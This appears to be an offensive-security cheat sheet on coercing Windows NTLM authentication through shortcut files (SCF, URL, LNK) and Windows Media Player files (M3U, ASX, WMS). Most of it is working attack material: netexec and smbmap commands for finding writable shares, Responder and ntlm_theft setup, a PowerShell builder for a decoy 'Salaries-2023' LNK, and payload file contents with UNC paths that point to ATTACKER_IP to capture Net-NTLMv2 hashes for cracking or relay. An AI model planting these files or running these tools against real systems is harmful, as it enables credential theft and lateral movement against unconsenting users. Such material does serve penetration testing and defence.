LIVING OFF THE LAND COERCION

PRIMARY CATEGORY → MITM & COERCED AUTHS   •   WINDOWS PRIVESC

Shortcut Files

e.g. SCF, LNK, URL and so on

Workflow

We must bear in mind that Windows File Explorer always tries to render the icon of any existing resource within a given location ( i.e. a directory )

Every resource has its own icon, whose location is specified within it

<SNIP>
iconFile=<ICON_FILE_PATH>
<SNIP>

For instance, if we compromises a principal that has WRITE permissions over a certain SMB share, we could try to place a shortcut file within the latter whose iconFile points to a remote SMB server controlled by the attacker

So, when any user accesses the share location where the shortcut file has been placed using the Windows File Explorer, the latter will try to start an SMB session to the target in order to request this resource i.e. the shortcut’s iconFile

Then, it will be asked for authentication, so we will receive an incoming authentication that we can leverage to either relay it to another host or try to crack the Net-NTLMv2 response

Any shortcut file we create should start with the @ character to ensure that it appears on top of the share, and, hence, the file explorer parses it

Requirements

• The controlled local/domain user account must have WRITE permissions over a location within an SMB share

Abuse

Verifying if the user account has write permissions over the share

Netexec

netexec smb '<TARGET>' --username '<USER>' --password '<PASSWD>' --shares

SMBMap

smbmap -H '<TARGET>' -u '<USER>' -p '<PASSWD>' -d '<DOMAIN>'

Setting up an SMB Server to intercept incoming authentications

• Responder

Setup

git clone https://github.com/lgandx/Responder Responder
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txt

Usage

python3 Responder.py --interface '<NETWORK_INTERFACE>' --verbose

Creating the malicious Shortcut File

• NTLM Theft

It generates multiple types of NTLMv2 hash theft files

Setup

git clone https://github.com/Greenwolf/ntlm_theft NTLMTheft
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install xlsxwriter

Usage

python3 ntlm_theft.py --generate all --server '<ATTACKER_IP>' --filename pwn

It creates a new directory named pwn which has the following content

Content

pwn
├── Autorun.inf
├── desktop.ini
├── pwn.application
├── pwn.asx
├── pwn-(externalcell).xlsx
├── pwn-(frameset).docx
├── pwn-(fulldocx).xml
├── pwn-(handler).htm
├── pwn.htm
├── pwn-(icon).url
├── pwn-(includepicture).docx
├── pwn.jnlp
├── pwn.library-ms
├── pwn.lnk
├── pwn.m3u
├── pwn.pdf
├── pwn-(remotetemplate).docx
├── pwn.rtf
├── pwn.scf
├── pwn-(stylesheet).xml
├── pwn.theme
├── pwn-(url).url
├── pwn.wax
└── zoom-attack-instructions.txt
 
1 directory, 24 files

• SCF

pwn.scf

[Shell]
Command=2
IconFile=\\<ATTACKER_IP>\share\legit.ico
[Taskbar]
Command=ToggleDesktop

• URL

pwn.url

[InternetShortcut]
URL=https://www.domain.tld
IconIndex=0
IconFile=\\<ATTACKER_IP>\something\something.ico

• LNK

Netexec

Netexec

Creation and Upload

netexec smb '<TARGET>' --username '<USER>' --password '<PASSWD>' --module slinky --options 'name=<ATTACKER_SMB_SHARE>' 'server=<ATTACKER_IP>'

Cleanup

netexec smb '<TARGET>' --username '<USER>' --password '<PASSWD>' --module slinky --options 'name=<ATTACKER_SMB_SHARE>' 'server=<ATTACKER_IP>' 'CLEANUP=True'

Powershell

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\pwn.lnk") # .LNK Creation
$lnk.TargetPath = "\\<ATTACKER_IP>\pwn.png" # .LNK Target
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Salaries-2023."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

---

Windows Media Player Files

e.g. WMS, WAX, ASX, M3U and so on

Workflow

An operator could craft a malicious file compatible with the Windows Media Player ( WMP ), which includes an UNC that points to the rogue server controlled by the attacker

Then, an SMB or HTTP server, depends on the client, is configured to listen for incoming connections, for which it requires authentication, so the client sends back the required authentication

Regarding the next step, the adversary needs to send the malicious file to the victim. For instance, let’s suppose that we face a web application that has an upload form, so we can upload the malicious file compatible with WMP that we have created previously

Once the victim receives and opens the given archive, the WMP will try to access the resource referenced in the specified UNC path

As stated, our server will ask for a valid authentication to the client, so we will receive an incoming authentication, which can be cracked or relayed

Requirements

• The victim OS version must use WMP as the default media player for this type of files

• The attacker must upload/write/send the malicious media file to an specific victim’s location

Abuse

Regarding NTLM Capture and the subsequent cracking, we can proceed as follows

Setting up a controlled Roguer Server

Responder

• Setup

git clone https://github.com/lgandx/Responder Responder
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txt

• Usage

python3 Responder.py --interface <NETWORK_INTERFACE>

Creating the malicious media file

• NTLM Theft

It generates multiple types of NTLMv2 hash theft files

Setup

git clone https://github.com/Greenwolf/ntlm_theft NTLMTheft
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install xlsxwriter

Usage

python3 ntlm_theft.py --generate all --server '<ATTACKER_IP>' --filename pwn

It creates a new directory named pwn which has the following content

Content

pwn
├── Autorun.inf
├── desktop.ini
├── pwn.application
├── pwn.asx
├── pwn-(externalcell).xlsx
├── pwn-(frameset).docx
├── pwn-(fulldocx).xml
├── pwn-(handler).htm
├── pwn.htm
├── pwn-(icon).url
├── pwn-(includepicture).docx
├── pwn.jnlp
├── pwn.library-ms
├── pwn.lnk
├── pwn.m3u
├── pwn.pdf
├── pwn-(remotetemplate).docx
├── pwn.rtf
├── pwn.scf
├── pwn-(stylesheet).xml
├── pwn.theme
├── pwn-(url).url
├── pwn.wax
└── zoom-attack-instructions.txt
 
1 directory, 24 files

• M3U

M3U

#EXTM3U
#EXTINF:1337, Leak
\\<ATTACKER_IP>\leak.mp3

• ASX

ASX

<asx version="3.0"> 
	<title>Leak</title> 
	<entry> 
		<title></title> 
		<ref href="file://<ATTACKER_IP>/leak/leak.wma"/> 
	</entry> 
</asx> 

• WMS

WMS

<THEME>
    <VIEW
        title="PoC"
        onload="JScript: player.URL='file://<ATTACKER_IP>/leak/leak.wma';"
    >
    </VIEW>
</THEME>

Resources

NTLM Vulnerabilities ( Unpatched Privesc Threats in Microsoft )

Creating a malicious WMS File

Living Off the Land: Stealing NetNTLMv2 Hashes